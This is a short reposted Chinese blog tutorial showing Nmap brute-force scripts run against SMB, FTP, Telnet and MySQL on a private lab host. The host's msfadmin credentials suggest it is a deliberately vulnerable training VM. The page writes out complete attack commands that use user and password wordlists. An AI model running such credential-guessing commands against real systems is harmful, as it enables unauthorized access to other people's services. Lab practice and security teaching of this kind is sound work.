关于Nmap的简单爆破【转】

首先我们来对目标系统进行一次简单的扫描,。以确定其开放的服务有哪些:
nmap 192.168.30.128
可以看到,目标服务器开放了众多的服务端口!


下面我们来对其 SMB 服务进行一个简单爆破:nmap -p445 –script smb-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128
可以看到用户名及密码均为 msfadmin !


爆破 FTP 服务密码及用户名:
nmap -p21 -sT –script ftp-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128
可以看到用户名及密码均为 msfadmin !


爆破 TELNET 服务用户名及密码:
nmap -p23 –script telnet-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128
可以看到用户名及密码均为 msfadmin !


爆破 MYSQL 数据库用户名及密码:
nmap -p3306 –script mysql-brute.nse –script-args userdb=./user.txt,passdb=./pass.txt 192.168.30.128
关于MYSQL的爆破,我分别在虚拟机和物理机下尝试均为成功。大致原因和我的网络环境或是软件本身有关,大家可以自己去尝试下!

此条目发表在未分类, 经验技术分类目录。将固定链接加入收藏夹。